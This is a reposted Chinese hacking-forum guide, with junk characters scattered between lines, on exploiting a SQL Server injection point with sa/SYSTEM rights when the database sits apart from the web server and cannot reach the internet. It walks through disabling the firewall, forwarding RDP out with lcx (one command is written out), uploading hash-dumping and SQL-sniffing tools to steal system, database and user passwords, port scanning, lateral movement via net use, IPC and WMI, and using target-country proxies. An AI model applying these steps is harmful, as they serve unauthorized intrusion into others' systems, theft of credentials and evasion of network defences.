当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。, j4 t1 w# [- O! s; }6 B% a: l+ Q
9 D" A+ A# v) ?2 R
: }1 h$ d7 k1 U. T/ g. p4 H X* ]6 V. I5 L5 h) j, {
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
: `1 v9 h6 z5 j
" ~4 t3 P W* r0 f* V% }1 s4 _9 y" S7 V" D+ z
一、DB机有公网IP.
# q4 y" D. {# P
9 R% M- a# p6 Y, m1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.1 }$ `5 W0 P+ @1 A) e" t6 y& i4 y
: g% q1 l X- `5 E0 Y
$ N7 |( s, t# N, U4 E/ N! ?* n7 r2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.. I1 c0 S/ \. k$ H& W: S, F
! J6 a( F5 @7 W4 y# B
/ \: m3 ^8 f( t8 O3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com2 k/ Q3 p; u! T0 y: I; C! X
" N; f# Z. @1 y& g! C3 M$ |( r
4 d& s* r! K1 {) P- ^0 W4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.. d! q) r9 Z9 {
& h; |1 q, ~: E% b* Q1 M; Q
# D* v# i' n$ s0 M
3 A: `) ]3 E. D6 r! r1 S二、DB机只有内网IP3 O. Q V ?# r/ Q- Y" q/ p5 O2 a# e
) ]) }2 g& q8 w' Z1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
0 J; _( T5 ?! q) A, B" P2 i8 ]* R; f/ c) R! V9 j& u, h
& N9 l7 R; @6 t9 s2:停掉防火墙和IP策略再从内往外扫描.
) X- H: S {. \# X( @) e' H) f# v& ^: ?1 p
6 w. i/ M5 a$ z' p$ \ ?5 g3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.0 E/ U3 j9 K9 f& b8 q7 c% o
k0 `, e, Z, L% g
: l) q+ E, t4 C7 J
4:学会密码规律分析往往会有惊喜.
5 f. p. N# O3 v- T+ u v5 V2 p# }9 w: M4 i$ @5 s, ?' @& V
9 ]: _) Y/ K/ _, W" S& T0 d; O+ i
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等7 G4 i2 e. G8 Z" W
& T8 F6 E2 u) a
; g+ e: `( r0 w- C6 S0 P7 I% N
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |